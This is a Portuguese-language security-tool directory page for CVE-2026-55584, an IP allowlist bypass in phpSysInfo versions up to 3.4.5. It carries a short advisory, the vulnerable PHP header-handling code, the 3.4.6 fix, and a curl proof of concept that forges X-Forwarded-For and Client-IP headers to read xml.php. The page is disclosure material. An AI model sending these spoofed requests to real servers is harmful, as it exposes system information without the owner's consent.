Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-55584 — CVE-2026-55584 — phpSysInfo IP Allowlist Bypass | Kitploit
Ferramentas/GitHubGitHub/mirackayikci/cve-2026-55584
Authentication & AuthorizationVulnerability AnalysisExploitationWeb SecurityPenetration TestingMisconfiguration
GitHubmirackayikci/cve-2026-55584

CVE-2026-55584

CVE-2026-55584 — phpSysInfo IP Allowlist Bypass

Ver Repositório
há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-55584 - Bypass da Lista de Permissões de IP do phpSysInfo

CWE-290, CVSS 7.5 (Alto), phpSysInfo <= 3.4.5

Refs: GHSA-786w-p5pm-cvgh, CVE.org

PSI_ALLOWED resolve o IP do cliente a partir dos cabeçalhos X-Forwarded-For (controlados pelo atacante) e depois Client-IP, antes de recorrer a REMOTE_ADDR. Não existe um conceito de proxy confiável, então falsificar um IP permitido burla a lista de permissões e expõe informações completas do sistema através do xml.php.

PoC:

root@kitploit:~
# lista de permissões definida para um endereço que o atacante não possui (ALLOWED=8.8.8.8)
curl -s http://target/xml.php                                # "Client IP address (...) not allowed."
curl -s -H "X-Forwarded-For: 8.8.8.8" http://target/xml.php  # bypass, XML completo
curl -s -H "Client-IP: 8.8.8.8"       http://target/xml.php  # bypass, XML completo

Código vulnerável (read_config.php):

root@kitploit:~
if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) {
    $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
} elseif (isset($_SERVER["HTTP_CLIENT_IP"])) {
    $ip = $_SERVER["HTTP_CLIENT_IP"];
} else {
    $ip = $_SERVER["REMOTE_ADDR"];   // única fonte confiável, verificada por último
}

Corrigido na versão 3.4.6 (019fa2d): padrão passa a ser REMOTE_ADDR; X-Forwarded-For / Client-IP são honrados apenas a partir de proxies confiáveis configurados.

Relatado por Muhammed Mirac Kayıkci

Baixar ferramenta